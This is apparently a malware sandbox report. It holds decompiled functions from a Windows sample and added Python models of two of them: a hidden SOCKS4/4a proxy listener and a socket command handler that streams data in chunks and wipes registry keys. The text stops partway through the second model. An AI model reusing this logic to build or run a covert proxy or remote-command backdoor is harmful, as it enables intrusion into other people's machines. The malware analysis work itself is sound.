    				signed int* _t45;
    
    				_t41 = __ecx;
    				_t43 = __edx;
    				if(__ecx == 1) {
    					 *_a4 =  *_a4 & 0x00000000;
    					return 0x1020500;
    				}
    				if(__ecx != 2) {
    					if(__ecx != 3) {
    						if(__ecx != 4) {
    							if(__ecx != 5) {
    								if(__ecx != 6) {
    									if(__ecx != 7) {
    										if(__ecx != 8) {
    											if(__ecx != 0xa) {
    												if(__ecx != 9) {
    													if(__ecx != 0xb) {
    														if(__ecx != 0xc) {
    															if(__ecx != 0xd) {
    																if(__ecx != 0xe) {
    																	L6:
    																	 *_a4 =  *_a4 & 0x00000000;
    																	L7:
    																	return 0;
    																}
    																 *_a4 =  *_a4 & 0x00000000;
    																_t16 =  *0x412a64; // 0x246f5a8
    																_t17 = GetProcAddress( *0x412c18,  *(_t16 + 0x68));
    																if(_t17 != 0) {
    																	 *_t17(0x8007);
    																}
    																 *((intOrPtr*)(0)) = 0;
    																_t19 = 0;
    																L38:
    																 *_t19 = 0;
    																_t19 = _t19 + 1;
    																goto L38;
    															}
    															_push( *0x412734);
    															L33:
    															E00405C99(_t43, _a4);
    															goto L7;
    														}
    														_push( *0x412730);
    														goto L33;
    													}
    													_push(0x412740);
    													goto L33;
    												}
    												 *_a4 =  *_a4 & 0x00000000;
    												_t23 =  *0x412948; // 0x0
    												if(_t23 != 0) {
    													CloseHandle(_t23);
    													 *0x412948 =  *0x412948 & 0x00000000;
    												}
    												goto L7;
    											}
    											_push(0x412740);
    											_t45 = 0x412948;
    											L23:
    											 *_a4 =  *_a4 & 0x00000000;
    											E00405C53(_t41, _t45);
    											goto L7;
    										}
    										 *_a4 =  *_a4 & 0x00000000;
    										_t28 =  *0x41294c; // 0x0
    										if(_t28 != 0) {
    											CloseHandle(_t28);
    											 *0x41294c =  *0x41294c & 0x00000000;
    										}
    										goto L7;
    									}
    									_push( *0x412734);
    									_t45 = 0x41294c;
    									goto L23;
    								}
    								 *_a4 =  *_a4 & 0x00000000;
    								_t31 =  *0x41273c; // 0x0
    								if(_t31 != 0) {
    									CloseHandle(_t31);
    									 *0x41273c =  *0x41273c & 0x00000000;
    								}
    								goto L7;
    							}
    							_push( *0x412730);
    							_t45 = 0x41273c;
    							goto L23;
    						}
    						 *_a4 =  *_a4 & 0x00000000;
    						_t34 =  *0x412ba0; // 0x17c0
    						return _t34;
    					}
    					SetEvent( *0x412738);
    					goto L6;
    				} else {
    					 *_a4 =  *_a4 & 0x00000000;
    					_t37 =  *0x412a8c; // 0x416000
    					_t3 = _t37 + 8; // 0x0
    					return  *_t3;
    				}
    			}

    APIs
    • CloseHandle.KERNEL32(00000000), ref: 00405D4B
    • CloseHandle.KERNEL32(00000000), ref: 00405D81
    • CloseHandle.KERNEL32(00000000), ref: 00405DCB
    • GetProcAddress.KERNELBASE(?), ref: 00405E2B
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$AddressProc
    • String ID:
    • API String ID: 4209786425-0
    • Opcode ID: 28d3fb948f60cd72b489aba31a573b2b4e18b74fae11d6c3a55426cbf8f57bc7
    • Instruction ID: 4f863c7c412c3f79e11dddebc7f766e184210e1abba91502929e94092bbe4a88
    • Opcode Fuzzy Hash: 28d3fb948f60cd72b489aba31a573b2b4e18b74fae11d6c3a55426cbf8f57bc7
    • Instruction Fuzzy Hash: 8E412B31614A009FDB258B15DE587AB37A5FF11361F10C037E506EB2A0C7B89CA09F9E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0040696D(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20) {
    				long _v8;
    				void* __edi;
    				intOrPtr* _t24;
    				intOrPtr _t25;
    				signed short _t26;
    				int _t27;
    				signed short _t28;
    				intOrPtr* _t29;
    				signed short _t31;
    				int _t32;
    				signed short _t34;
    				signed short _t37;
    				void* _t42;
    				signed int _t48;
    				void* _t57;
    
    				_t48 = __edx;
    				_push(__ecx);
    				_v8 = _v8 & 0x00000000;
    				_t24 = _a8;
    				if(_a16 != 2) {
    					_t25 =  *_t24;
    				} else {
    					_t25 =  *((intOrPtr*)(_t24 + 0x10));
    				}
    				if(_t25 != 0) {
    					_t42 = _t25 + _a4;
    					_t26 = IsBadHugeReadPtr(_t42, 4);
    					__eflags = _t26;
    					if(_t26 == 0) {
    						while(1) {
    							_t31 =  *_t42;
    							__eflags = _t31;
    							if(_t31 == 0) {
    								break;
    							}
    							__eflags = _a16 - 2;
    							if(_a16 != 2) {
    								__eflags = _a16;
    								if(_a16 != 0) {
    									__eflags = _a16 - 1;
    									if(_a16 != 1) {
    										goto L18;
    									} else {
    										__eflags = _t31;
    										if(_t31 < 0) {
    											goto L18;
    										} else {
    											_t57 = _t31 + _a4;
    											_t34 = VirtualProtectEx( *0x4129ec, _t57, 4, 0x40,  &_v8);
    											__eflags = _t34;
    											if(_t34 == 0) {
    												goto L18;
    											} else {
    												_t17 = _t57 + 2; // 0x41244a
    												_t48 = _t48 | 0xffffffff;
    												_t37 = E0040D3EC(_t48, _a12, _t48, _t17);
    												VirtualProtectEx( *0x4129ec, _t57, 4, _v8,  &_v8);
    												__eflags = _t37;
    												goto L17;
    											}
    										}
    									}
    								} else {
    									__eflags = _t31;
    									if(_t31 >= 0) {
    										goto L18;
    									} else {
    										__eflags = _a12 - (_t31 & 0x0000ffff);
    										goto L17;
    									}
    								}
    							} else {
    								__eflags = _t31 - _a12;
    								L17:
    								if(__eflags != 0) {
    									L18:
    									_t42 = _t42 + 4;
    									_t32 = IsBadHugeReadPtr(_t42, 4);
    									__eflags = _t32;
    									if(_t32 == 0) {
    										continue;
    									}
    								}
    							}
    							break;
    						}
    					}
    					_t27 = IsBadHugeReadPtr(_t42, 4);
    					__eflags = _t27;
    					if(_t27 != 0) {
    						L26:
    						_t28 = 0;
    						__eflags = 0;
    					} else {
    						__eflags =  *_t42 - _t27;
    						if( *_t42 == _t27) {
    							goto L26;
    						} else {
    							__eflags = _a16 - 2;
    							if(_a16 != 2) {
    								_t29 = _a8;
    								_t53 =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
    								__eflags =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
    							} else {
    								_t53 = _t42;
    							}
    							_t28 = E00406835(_t53,  &_a20);
    						}
    					}
    				} else {
    					_t28 = 0;
    				}
    				return _t28;
    			}

    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 0040699B
    • IsBadHugeReadPtr.KERNEL32(-00000004,00000004), ref: 00406A2D
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00406A3F
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead
    • String ID:
    • API String ID: 2080902951-0
    • Opcode ID: 9c2b28c445fdb103559f5ecc9c8dec2dfa73f39c85902b0711ee43601a373df0
    • Instruction ID: 90857d809eb30bdda7fb6041671479c6cd79516dd4972e7f18f76442e8f3e416
    • Opcode Fuzzy Hash: 9c2b28c445fdb103559f5ecc9c8dec2dfa73f39c85902b0711ee43601a373df0
    • Instruction Fuzzy Hash: AF3172B1700246ABDF10DF24DD45B9B3BA8AB02314F168076F903F71D1D678D920DB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040A838(signed int __eax, void* __ebx, void* __edi) {
    				void* __esi;
    				signed char _t40;
    				signed int _t41;
    				void* _t45;
    				void* _t62;
    				void* _t63;
    				signed int _t65;
    				void* _t69;
    				void* _t70;
    				signed char* _t74;
    
    				_t69 = __edi;
    				_t62 = __ebx;
    				_t74 = __eax * 0x30 +  *0x412e10;
    				if(( *_t74 & 0x00000001) != 0) {
    					WaitForSingleObject(_t74[0x14], 0xffffffff);
    					CloseHandle(_t74[0x14]);
    				}
    				_push(_t62);
    				_t63 = 0;
    				if(_t74[0x28] > 0) {
    					_push(_t69);
    					_t70 = 0;
    					do {
    						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 4)));
    						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 0xc)));
    						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 0x10)));
    						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 0x14)));
    						_t63 = _t63 + 1;
    						_t70 = _t70 + 0x18;
    					} while (_t63 < _t74[0x28]);
    				}
    				E0040CF40(_t74[0x18]);
    				E0040CF40(_t74[0x24]);
    				if(( *_t74 & 0x00000002) != 0) {
    					InternetCloseHandle(_t74[0x10]);
    					InternetCloseHandle(_t74[0xc]);
    					InternetCloseHandle(_t74[8]);
    				}
    				_t40 =  *_t74;
    				if((_t40 & 0x0000000c) != 0) {
    					if((_t40 & 0x00000008) != 0) {
    						_t47 = _t74[0x2c];
    						if(_t74[0x2c] != 0) {
    							E0040CF40( *((intOrPtr*)(_t47 + 0x14)));
    						}
    					}
    					E0040CF40(_t74[0x2c]);
    				}
    				_t41 =  *0x412e0c; // 0x0
    				_t74[4] = _t74[4] & 0x00000000;
    				if(_t41 <= 0) {
    					L18:
    					return _t41;
    				} else {
    					_t65 =  *0x412e10; // 0x0
    					if(_t74 != _t41 * 0x30 + _t65 - 0x30) {
    						goto L18;
    					} else {
    						if(_t41 != 1) {
    							_t42 = _t41 - 1;
    							 *0x412e0c = _t41 - 1;
    							return E0040CED8(_t42 * 0x30, 0x412e10);
    						}
    						_t45 = E0040CF40(_t65);
    						 *0x412e10 =  *0x412e10 & 0x00000000;
    						 *0x412e0c =  *0x412e0c & 0x00000000;
    						return _t45;
    					}
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040C135), ref: 0040A84E
    • CloseHandle.KERNEL32(?), ref: 0040A857
    • InternetCloseHandle.WININET(?), ref: 0040A8BB
    • InternetCloseHandle.WININET(?), ref: 0040A8C4
    • InternetCloseHandle.WININET(?), ref: 0040A8CD
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$Internet$ObjectSingleWait
    • String ID:
    • API String ID: 2916869018-0
    • Opcode ID: f5f6eabec6013882fe9ae0914b5e655e4c5c327207d954bc61636f621c10cf3c
    • Instruction ID: 392a9b98ff70ae517ff64585876de2f89269b0f07f1f4466d38df50159cc76b9
    • Opcode Fuzzy Hash: f5f6eabec6013882fe9ae0914b5e655e4c5c327207d954bc61636f621c10cf3c
    • Instruction Fuzzy Hash: 8D3183326007019FC730AF2ADD81A46BBE6BF04314701CA7EF551A65F1CB75E8619B49
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004091EC(void** __esi, intOrPtr _a4) {
    				void* _t7;
    
    				_t18 = __esi;
    				if(__esi != 0) {
    					SetEvent(__esi[1]);
    					E00409266(_t18, _a4, 0, 0, 0, 0, 0);
    					WaitForSingleObject(__esi[2], 0xffffffff);
    					CloseHandle( *__esi);
    					CloseHandle(__esi[1]);
    					CloseHandle(__esi[2]);
    					E0040CF40(__esi[4]);
    					return E0040CF40(__esi);
    				}
    				return _t7;
    			}
    Instruction addresses of the listing above span 0x004091ef to 0x0040923e (per-line address column not reproduced).

    APIs
    • SetEvent.KERNEL32(?,00000000,004089D0,?), ref: 004091F6
      • Part of subcall function 00409266: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
      • Part of subcall function 00409266: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    • WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040920F
    • CloseHandle.KERNEL32(00000004), ref: 00409217
    • CloseHandle.KERNEL32(?), ref: 00409220
    • CloseHandle.KERNEL32(?), ref: 00409229
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Handle$CloseWrite$Read$CreateEventFreeHeapNamedObjectPipeSingleStateWait
    • String ID:
    • API String ID: 998100866-0
    • Opcode ID: ef7144c4cf4367d55c7ee9141404e70e10fb2d81fc139922bf5f35d3da979a96
    • Instruction ID: fdc780931818633964e1cd0b074f8ef0f02cc77b69a317d27a95eba1a79fdcc3
    • Opcode Fuzzy Hash: ef7144c4cf4367d55c7ee9141404e70e10fb2d81fc139922bf5f35d3da979a96
    • Instruction Fuzzy Hash: 8FE0C031004501EBC7362F76DE0988EBE72FF447113108A3DF266904B9DF755861AB49
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E0040EE6E(char _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				unsigned int _v25;
    				short _v27;
    				signed char _v28;
    				unsigned int _v40;
    				short _v42;
    				char _v44;
    				char _v304;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t54;
    				short _t69;
    				void* _t71;
    				void* _t74;
    				void* _t75;
    				char _t86;
    				char _t94;
    				void* _t104;
    				void* _t106;
    				char _t120;
    				char _t125;
    				void* _t128;
    				intOrPtr _t129;
    				void* _t130;
    
    				_t116 = _a4;
    				_push( &_v28);
    				_push(_a4);
    				_t54 = 7;
    				if(E0040E250(_t54) != 0) {
    					_t104 = 1;
    					while(E0040E250(_t104, _t116,  &_v9) != 0) {
    						if(_v9 == 0) {
    							_t108 = _v25;
    							_v13 = 0x5a;
    							if(((_v25 & 0x00ff0000 | _v25 >> 0x00000010) >> 0x00000008 | (_t108 & 0x0000ff00 | _t108 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								L21:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L47:
    									return E0040EDF8(_a4, 0xffffffff, _v13, 0) & 0xffffff00 | _t65 != 0x00000000;
    								}
    								E0040CFFE( &_v44,  &_v44, 0, 0x10);
    								_t69 = 2;
    								_v44 = _t69;
    								_t71 = (_v28 & 0x000000ff) - 1;
    								if(_t71 == 0) {
    									_v42 = _v27;
    									_v40 = _v25;
    									_t74 = E0040E29E( &_v44, 0x10);
    									_t124 = _t74;
    									if(_t74 == 0xffffffff) {
    										L24:
    										_v13 = 0x5b;
    										goto L47;
    									}
    									_t75 = E0040EDF8(_a4, _t124, 0x5a, 0);
    									if(_t75 != _t104) {
    										if(_t75 != 0xffffffff) {
    											_v9 = 0;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										E0040E319(_t124, _a4);
    									}
    									E0040E441(_t124);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L37:
    										return _v9;
    									} else {
    										goto L47;
    									}
    								}
    								if(_t71 == 1) {
    									_t125 = E0040E2D4( &_v44, 0x10, _t104);
    									_v20 = _t125;
    									if(_t125 == 0xffffffff) {
    										goto L24;
    									}
    									_t120 = E0040EDF8(_a4, _t125, 0x5a, 0);
    									if(_t120 != _t104) {
    										E0040E441(_t125);
    										L34:
    										if(_t120 == 0xffffffff) {
    											goto L24;
    										}
    										if(_t120 != _t104) {
    											_v9 = 0;
    										}
    										goto L37;
    									}
    									_t106 = E0040E3BF( &_v20,  &_a4);
    									if(_t106 != 0xffffffff) {
    										_t106 =  *0x412bd8(_t106, 0, 0);
    									}
    									E0040E441(_v20);
    									if(_t106 == 0xffffffff) {
    										goto L24;
    									} else {
    										_t122 = _a4;
    										_t86 = E0040EDF8(_a4, _t106, 0x5a, 2);
    										_v20 = _t86;
    										if(_t86 == 1) {
    											E0040E319(_t106, _t122);
    										}
    										E0040E441(_t106);
    										_t120 = _v20;
    										_t104 = 1;
    										goto L34;
    									}
    								}
    								goto L24;
    							}
    							_t128 = 0;
    							while(E0040E250(_t104, _t116,  &_v9) != 0) {
    								_t94 = _v9;
    								 *((char*)(_t130 + _t128 - 0x12c)) = _t94;
    								if(_t94 == 0) {
    									_push( &_v20);
    									_push(0);
    									_push(0);
    									_push( &_v304);
    									_v20 = 0;
    									if( *0x412be8() == 0) {
    										_t129 = _v20;
    										while(_t129 != 0) {
    											if( *((intOrPtr*)(_t129 + 4)) == 2) {
    												E0040CF7C( &_v25,  *((intOrPtr*)(_t129 + 0x18)) + 4, 4);
    												L20:
    												 *0x412bec(_v20);
    												if(_t129 == 0) {
    													goto L13;
    												}
    												goto L21;
    											}
    											_t129 =  *((intOrPtr*)(_t129 + 0x1c));
    										}
    										goto L20;
    									}
    									L13:
    									_v13 = 0x5b;
    									goto L21;
    								}
    								_t128 = _t128 + 1;
    								if(_t128 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}
    Instruction addresses of the listing above span 0x0040ee7a to 0x0040f0b4 (per-line address column not reproduced).

    APIs
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040EF28
    • FreeAddrInfoW.WS2_32(?), ref: 0040EF61
    • accept.WS2_32(00000000,00000000,00000000), ref: 0040EFE4
      • Part of subcall function 0040E441: shutdown.WS2_32(?,00000002), ref: 0040E449
      • Part of subcall function 0040E441: closesocket.WS2_32(?), ref: 0040E450
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddrFreeInfoacceptclosesocketgetaddrinfoshutdown
    • String ID: Z
    • API String ID: 3598408102-1505515367
    • Opcode ID: 7ea22eb6468d9e9231e2ca8235e7fd27982b9e2e42f310e2c66d9ee4bb4fb59f
    • Instruction ID: f468557edf92106ed5e48b00aedf455d29ce3992e26420ef702732d383d78009
    • Opcode Fuzzy Hash: 7ea22eb6468d9e9231e2ca8235e7fd27982b9e2e42f310e2c66d9ee4bb4fb59f
    • Instruction Fuzzy Hash: EE615F31A00209AADF309AA6CC41BEF7B6A9F45354F040977FA50F72C2C2BC5956879E
    Uniqueness

    Uniqueness Score: -1.00%
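
The handler E0040EE6E above has the byte layout and status codes of a SOCKS4/4a server: after the version byte it reads a 1-byte command, a 2-byte port and a 4-byte address, then a NUL-terminated user id byte by byte; when the address is 0.0.0.x (x != 0) it reads a NUL-terminated hostname into a 256-byte buffer and resolves it with getaddrinfo, keeping the first AF_INET entry. Command 1 connects (E0040E29E), command 2 listens and accepts (E0040E2D4, accept), anything else is refused, and the reply code is 0x5a (granted) or 0x5b (rejected), sent through E0040EDF8. The following Python is an added example written for this report, not code from the sample: it models that decision logic so an analyst can exercise the same edge cases offline. The `resolve`, `connect` and `bind` callables and the hostname `example.test` are this example's assumptions; the sample calls getaddrinfo and the Winsock functions directly.

```python
"""Model of the SOCKS4/4a request handling visible in E0040EE6E (added example, not sample code)."""
import struct
from typing import Callable, Optional

REPLY_GRANTED = 0x5A   # _v13 = 0x5a in the decompile
REPLY_REJECTED = 0x5B  # _v13 = 0x5b
CD_CONNECT = 1         # _t71 == 0, i.e. CD - 1 == 0
CD_BIND = 2            # _t71 == 1
HOSTNAME_BUF = 0xFF    # the hostname loop gives up once the index passes 0xff


class SocksError(ValueError):
    """Raised where the handler returns 0 without sending any reply."""


def _read_cstring(buf: bytes, off: int, limit: int):
    """Read a NUL-terminated string of at most `limit` bytes starting at `off`."""
    end = buf.find(b"\x00", off, off + limit + 1)
    if end < 0:
        raise SocksError("unterminated string or buffer overrun")
    return buf[off:end], end + 1


def parse_request(buf: bytes) -> dict:
    """Parse everything after the SOCKS version byte: CD, DSTPORT, DSTIP, USERID[, HOSTNAME]."""
    if len(buf) < 7:                                # handler reads exactly 7 bytes first
        raise SocksError("short request: handler expects 7 bytes first")
    cd, port = struct.unpack_from(">BH", buf, 0)    # port is kept in network order by the sample
    ip = buf[3:7]
    userid, off = _read_cstring(buf, 7, 0xFFFF)
    host = None
    if 1 <= int.from_bytes(ip, "big") <= 0xFF:      # the byte-swapped (ip - 1) > 0xfe test, inverted
        host, off = _read_cstring(buf, off, HOSTNAME_BUF)
    return {"cd": cd, "port": port, "ip": ip, "userid": userid, "host": host}


# Assumed interfaces so the example runs offline (not the sample's API):
Resolver = Callable[[bytes], Optional[bytes]]       # hostname -> 4-byte IPv4 (first AF_INET) or None
Connector = Callable[[bytes, int], bool]            # (ip, port) -> True if connect / listen succeeded


def decide_reply(req: dict, resolve: Resolver, connect: Connector, bind: Connector) -> int:
    """Return the reply code the handler would send for this request.

    `resolve`, `connect` and `bind` stand in for getaddrinfo, E0040E29E and E0040E2D4.
    """
    ip = req["ip"]
    if req["host"] is not None:
        ip = resolve(req["host"])
        if ip is None:                              # getaddrinfo failed or no AF_INET entry -> L13
            return REPLY_REJECTED
    if req["cd"] == CD_CONNECT:
        return REPLY_GRANTED if connect(ip, req["port"]) else REPLY_REJECTED
    if req["cd"] == CD_BIND:
        return REPLY_GRANTED if bind(ip, req["port"]) else REPLY_REJECTED
    return REPLY_REJECTED                           # any other CD falls through to L24


def build_reply(code: int, port: int = 0, ip: bytes = b"\x00\x00\x00\x00") -> bytes:
    """Standard 8-byte SOCKS4 reply: VN=0, CD=code, DSTPORT, DSTIP.

    The sample builds its reply inside E0040EDF8, whose body is not shown on this page.
    """
    return struct.pack(">BBH", 0, code, port) + ip


if __name__ == "__main__":
    # Constructed sample: CONNECT to 93.184.216.34:80 with user id "user".
    req = parse_request(b"\x01\x00\x50\x5d\xb8\xd8\x22user\x00")
    code = decide_reply(req, lambda h: None, lambda ip, p: True, lambda ip, p: False)
    print(req, build_reply(code, req["port"], req["ip"]).hex())
```

Two behaviours worth noting when probing such a listener: an over-long SOCKS4a hostname (256 bytes without a NUL) makes the handler drop the connection silently rather than answer 0x5b, and an unresolvable hostname or an unknown command both produce the same 0x5b reply, so the reply code alone does not tell you which check failed.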

    C-Code - Quality: 47%
    			E0040822B(intOrPtr _a4) {
    				char _v76;
    				char _v80;
    				char _v84;
    				intOrPtr _v88;
    				void* _v92;
    				char _v96;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				char _v124;
    				intOrPtr _v140;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t51;
    				intOrPtr _t52;
    				intOrPtr _t55;
    				void* _t68;
    				void* _t81;
    				intOrPtr* _t84;
    				intOrPtr _t90;
    				intOrPtr* _t93;
    
    				_t90 = _a4;
    				_push(0x2710);
    				_t81 = 4;
    				_push(_t81);
    				_push( &_v84);
    				if(E0040E1DD(_t90) != _t81 || E0040E1DD(_t90,  &_v96, _t81, 0x2710) != _t81) {
    					L31:
    					return E0040E441(_a4);
    				} else {
    					_t51 = _v96;
    					if(_t51 > 0xffff || _t51 == 0) {
    						goto L31;
    					} else {
    						_t52 = E0040CF2D(_t51);
    						_v88 = _t52;
    						if(_t52 == 0) {
    							goto L31;
    						}
    						if(E0040E1DD(_t90, _t52, _v96, 0x2710) != _v108) {
    							L30:
    							E0040CF40(_v88);
    							goto L31;
    						}
    						if(_v84 == 0xa) {
    							_t55 =  *0x412a64; // 0x246f5a8
    							_v80 = 0x32;
    							_v92 = E0040D0A7( *((intOrPtr*)(_t55 + 0x70)));
    							if(_v96 >= _t81) {
    								_t87 = _v88;
    								E0040CF7C( &_v80, _v88, _t81);
    								_t75 = _v108;
    								if(_v108 > _t81) {
    									_v96 = E0040D379(_t75 + 0xfffffffc, _t87 + 4);
    								}
    							}
    							if(_v92 == 0) {
    								goto L30;
    							} else {
    								_t93 = E00407D61(_v92, _v80, 0);
    								_v92 = _t93;
    								if(_t93 == 0) {
    									L29:
    									E0040CF40(_v92);
    									goto L30;
    								}
    								_push(1);
    								_push( &_v76);
    								_push(_t93);
    								if( *((intOrPtr*)( *_t93 + 0x30))() != 0) {
    									L28:
    									 *((intOrPtr*)( *_t93 + 8))(_t93);
    									goto L29;
    								}
    								_v76 = 0x1000;
    								 *0x412bb4(_a4,  &_v80, 8, 0);
    								_t65 = _v92;
    								if(_v92 == 0) {
    									goto L28;
    								}
    								_t84 = E0040CF2D(_t65);
    								if(_t84 == 0) {
    									goto L28;
    								}
    								while(1) {
    									_t68 =  *((intOrPtr*)( *_t93 + 0xc))(_t93, _t84, _v92,  &_v124);
    									if(_t68 != 0 || _v140 == _t68) {
    										break;
    									}
    									_push(_t68);
    									_push(_v140);
    									_push(_t84);
    									_push(_a4);
    									if( *0x412bb4() == 0xffffffff) {
    										break;
    									}
    									if(E0040E1DD(_a4, _t84, 4, 0x2710) != 4 ||  *_t84 != _v124) {
    										_t93 = _v140;
    										break;
    									} else {
    										_t93 = _v140;
    										continue;
    									}
    								}
    								E0040CF40(_t84);
    								goto L28;
    							}
    						}
    						if(_v84 == 0x14 && _v96 >= _t81) {
    							_push(0);
    							_push(_v96);
    							_push(_v88);
    							_push(_t90);
    							if( *0x412bb4() == _v112) {
    								E00409F45();
    							}
    						}
    						goto L30;
    					}
    				}
    			}
    Instruction addresses of the listing above span 0x00408237 to 0x00408415 (per-line address column not reproduced).

    APIs
      • Part of subcall function 0040E1DD: select.WS2_32(00000000,?,00000000,00000000,00002710), ref: 0040E22D
      • Part of subcall function 0040E1DD: recv.WS2_32(?,?,?,00000000), ref: 0040E245
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • send.WS2_32(?,00002710,00002710,00000000), ref: 004082CE
      • Part of subcall function 00409F45: GetCurrentThread.KERNEL32 ref: 00409F48
      • Part of subcall function 00409F45: SetThreadPriority.KERNEL32(00000000,?,00407523), ref: 00409F4F
      • Part of subcall function 00409F45: SHDeleteKeyA.SHLWAPI(80000001,?,?,00407523), ref: 00409F62
      • Part of subcall function 00409F45: SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F76
      • Part of subcall function 00409F45: SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F85
      • Part of subcall function 00409F45: Sleep.KERNEL32(000003E8,?,00407523), ref: 00409F90
    • send.WS2_32(?,00000000,00000008,00000000), ref: 0040837F
    • send.WS2_32(?,00000000,00002710,00000000), ref: 004083C1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Deletesend$Thread$AllocateCurrentHeapPrioritySleeprecvselect
    • String ID: 2
    • API String ID: 4172955902-450215437
    • Opcode ID: add99a1411b4caff1b10f0ac08378719a653d1f3ebd264d18e46b9e0885d9899
    • Instruction ID: 18fe43ebdc9abdf3dc28419ad3a27aaa85eca5f66f5b0d38311b8ff00febec27
    • Opcode Fuzzy Hash: add99a1411b4caff1b10f0ac08378719a653d1f3ebd264d18e46b9e0885d9899
    • Instruction Fuzzy Hash: 7B519C71108302AFC710EF65C98092F77E9EF84758F10893EF994A62D2DB39E945CB5A
    Uniqueness

    Uniqueness Score: -1.00%
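
E0040822B above reads a 4-byte command and a 4-byte length from the socket (each via E0040E1DD, a select/recv with a 0x2710 ms timeout), closes the connection if the length is 0 or above 0xffff, allocates and reads the body, then dispatches: command 0x14 with a body of at least 4 bytes sends the body back and, if the send completed, calls E00409F45 (SHDeleteKeyA on HKCU and HKLM followed by Sleep, per the subcall list); command 0x0a sends an 8-byte header made of the body's first 4 bytes (0x32 if the body is shorter) and the chunk size 0x1000, then sends 0x1000-byte chunks, reading a 4-byte acknowledgement after each one and stopping when it is missing or disagrees. The Python below is an added example written for this report, not the sample's code, modelling that framing and the chunk/ack loop so the bounds and the stop conditions can be tested offline. The `payload` argument stands in for whatever the object created in E00407D61 reads out (its source is not shown on this page), and the assumption that the acknowledgement is compared with the length of the chunk just sent (the decompiler's _v124 and _v140 appear to be the same stack slot) is this example's, not the report's.

```python
"""Model of the command framing handled by E0040822B (added example, not sample code)."""
import struct
from typing import Iterator, List, Optional, Tuple

RECV_TIMEOUT_MS = 0x2710   # fourth argument to E0040E1DD (select/recv timeout)
MAX_BODY = 0xFFFF          # _t51 > 0xffff || _t51 == 0 -> close without reply
CHUNK_SIZE = 0x1000        # _v76 = 0x1000, announced in the 8-byte header
DEFAULT_TAG = 0x32         # _v80 = 0x32 before the body's first 4 bytes may overwrite it
CMD_STREAM = 0x0A
CMD_ECHO_CLEANUP = 0x14


class FrameError(ValueError):
    """Any condition under which the handler closes the socket without replying."""


def parse_frame(buf: bytes) -> Tuple[int, bytes]:
    """Parse 'u32 cmd, u32 len, body[len]' with the same bounds the sample enforces."""
    if len(buf) < 8:
        raise FrameError("need 4-byte command and 4-byte length")
    cmd, length = struct.unpack_from("<II", buf, 0)
    if length == 0 or length > MAX_BODY:
        raise FrameError(f"body length {length:#x} outside 1..0xffff")
    body = buf[8:8 + length]
    if len(body) != length:
        raise FrameError("truncated body")
    return cmd, body


def stream_header(body: bytes) -> bytes:
    """8-byte header for cmd 0x0a: first 4 body bytes (or 0x32 when body < 4) + chunk size."""
    tag = body[:4] if len(body) >= 4 else struct.pack("<I", DEFAULT_TAG)
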